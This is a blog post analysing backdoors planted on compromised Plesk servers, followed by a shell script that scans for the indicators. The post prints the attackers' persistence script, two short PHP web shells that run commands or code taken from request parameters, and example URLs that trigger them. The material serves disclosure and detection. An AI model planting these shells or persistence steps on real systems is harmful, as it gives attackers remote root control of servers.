Plesk backdoors, a very large number of servers compromised.

In another post ( http://0entropy.blogspot.com/2012_03_01_archive.html ) we wrote about some perl scripts, bots, that were found in PLESK server installations. Apparently there is more to it. As also described in the Parallels forums, http://forum.parallels.com/showthread.php?t=258101 , the attacks were quite elaborate. Attackers, using the bug http://kb.parallels.com/en/112303 , were able to get access to PLESK installations and install backdoors in the systems. I'm using the plural, backdoors, because it's not just one; there are quite a few.

In some systems /dev/shm/persist was created with the following code:

# cat /dev/shm/persist
#!/bin/bash
export PATHS="/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin"
export MYSUDO=""
for n in $PATHS; do export MYSUDO="$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)";done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=""
for n in $PATHS; do export PSAD="$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)";done
for PSADMD in $PSAD;do $MYSUDO "sed -i \"/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\" /etc/init.d/psa";$MYSUDO $PSADMD;done
$MYSUDO 'mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php'
$MYSUDO 'mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php'

In some cases this file was hex encoded, in others it was in plain text form.

In this way the attackers keep the vulnerable (by default) version of 'agent.php' on the system, under the name old.php, and the sed line in the script makes /etc/init.d/psa start psadmd whenever Plesk starts. On top of that, they installed a backdoor under the name engine.php in the path /usr/local/psa/admin/htdocs/enterprise/control/psa.

Prior to this attack, another attack was performed with fewer modifications to the systems. During the last days of August 2011, attackers used the same vulnerable version of 'agent.php' to upload a file named ctrl.php3 under the path /usr/local/psa/admin/htdocs/enterprise/control. The file ctrl.php3 contained the following:

<?
if (isset($_REQUEST['x']))
{
    passthru($_REQUEST['x']);
}
?>

A simple web request of the form http://domain:8443/enterprise/control/ctrl.php3?x=command will execute the command on the system.

I assume the first attack went unnoticed by many, and its scale was much smaller than the second. The second attack, again using 'agent.php' as described above, left the file engine.php together with other files on the systems. The file engine.php is very similar to ctrl.php3; specifically, engine.php is the following:

<?
if (isset($_REQUEST['x']))
{
    eval($_REQUEST['x']);
}
if (isset($_REQUEST['z']))
{
    passthru($_REQUEST['z']);
}
?>

Command execution can now be performed in two ways: one way is using javascript code under the variable x, the other is direct command execution under the variable z. An attack on the systems could be performed directly with the following url:

http://domain:8443/enterprise/control/psa/engine.php?z=command

Other files that were created during the second attack:

/opt/psa/admin/bin/psadmd
/opt/psa/admin/bin/psactl

Both files were setuid root; psadmd is a backdoor that runs on the system on port 32399 and psactl is just a suid root shell.

Check your PLESK servers for the existence of the above files and whether port 32399 is open.
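One way to carry out these checks on a Plesk host is the following POSIX shell script. It is an added example, not code from the post or from Parallels. It looks for the files and the /etc/init.d/psa hook that the persist script leaves behind, greps the control panel's PHP tree for the eval/passthru-on-request pattern shared by ctrl.php3 and engine.php (so a renamed copy is still caught), and checks whether port 32399 is listening. The /usr/local/psa mirror paths and the reliance on ss or netstat are assumptions; the ROOT prefix is there so the file checks can run against a mounted disk image or a test tree instead of the live host.

```shell
#!/bin/sh
# Added example (not part of the original post): scan a Plesk host for the
# indicators the post lists. ROOT is an optional path prefix so the file checks
# can run against a mounted disk image or a test tree; empty ROOT = live host.

# File-system indicators named in the post. The /usr/local/psa mirrors are an
# assumption: the persist script probes both prefixes, so both are checked.
PLESK_IOC_FILES="
/dev/shm/persist
/opt/psa/admin/bin/psadmd
/opt/psa/admin/bin/psactl
/usr/local/psa/admin/bin/psadmd
/usr/local/psa/admin/bin/psactl
/opt/psa/admin/htdocs/enterprise/control/ctrl.php3
/usr/local/psa/admin/htdocs/enterprise/control/ctrl.php3
/opt/psa/admin/htdocs/enterprise/control/psa/engine.php
/usr/local/psa/admin/htdocs/enterprise/control/psa/engine.php
/opt/psa/admin/htdocs/enterprise/control/old.php
/usr/local/psa/admin/htdocs/enterprise/control/old.php
"

# Print every indicator path that exists under ROOT.
plesk_ioc_files() {
    root="${1:-}"
    for f in $PLESK_IOC_FILES; do
        [ -e "$root$f" ] && echo "$root$f"
    done
    return 0
}

# Print indicator paths that carry the setuid bit (psadmd/psactl were suid root).
plesk_ioc_suid() {
    root="${1:-}"
    for f in $PLESK_IOC_FILES; do
        [ -u "$root$f" ] && echo "$root$f"
    done
    return 0
}

# Return 0 if /etc/init.d/psa mentions psadmd or psadmind: the persist script
# inserts that line after daemon_name=sw-cp-serverd so the backdoor starts
# together with Plesk.
plesk_init_hook() {
    root="${1:-}"
    init="$root/etc/init.d/psa"
    [ -f "$init" ] || return 1
    grep -qE 'psadm(in)?d' "$init"
}

# Print control-panel PHP files that pass request input straight to eval() or
# passthru(), the pattern of both ctrl.php3 and engine.php. This catches a
# renamed copy that the path list above would miss.
plesk_webshell_grep() {
    root="${1:-}"
    for d in /opt/psa/admin/htdocs /usr/local/psa/admin/htdocs; do
        [ -d "$root$d" ] || continue
        find "$root$d" -type f \( -name '*.php' -o -name '*.php3' \) \
            -exec grep -lE '(eval|passthru)[[:space:]]*\(\$_(REQUEST|GET|POST)' {} + \
            2>/dev/null || true
    done
    return 0
}

# Return 0 if something listens on TCP PORT (default 32399); 2 if neither ss
# nor netstat is available on the host.
plesk_port_listening() {
    port="${1:-32399}"
    if command -v ss >/dev/null 2>&1; then
        ss -ltn 2>/dev/null | grep -qE ":$port[[:space:]]"
    elif command -v netstat >/dev/null 2>&1; then
        netstat -ltn 2>/dev/null | grep -qE ":$port[[:space:]]"
    else
        return 2
    fi
}

# One tagged line per finding. The port check only makes sense on the live
# host, so it runs only when ROOT is empty.
plesk_ioc_report() {
    root="${1:-}"
    plesk_ioc_files "$root" | sed 's/^/FILE /'
    plesk_ioc_suid "$root" | sed 's/^/SUID /'
    plesk_webshell_grep "$root" | sed 's/^/WEBSHELL /'
    if plesk_init_hook "$root"; then echo "INITHOOK $root/etc/init.d/psa"; fi
    if [ -z "$root" ] && plesk_port_listening 32399; then echo "PORT 32399"; fi
    return 0
}

# Number of findings, usable as a quick pass/fail from cron or a fleet tool.
plesk_ioc_count() {
    plesk_ioc_report "${1:-}" | wc -l | tr -d ' '
}

# Usage: sh plesk_ioc_scan.sh scan [ROOT]
case "${1:-}" in
    scan) plesk_ioc_report "${2:-}"; echo "findings: $(plesk_ioc_count "${2:-}")" ;;
esac
```

Run it as root on the live host with `sh plesk_ioc_scan.sh scan`; a findings count above zero means at least one of the post's indicators is present and the host needs a closer look. Pointing ROOT at a mounted image of a suspect disk lets the same file checks run from a clean machine.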
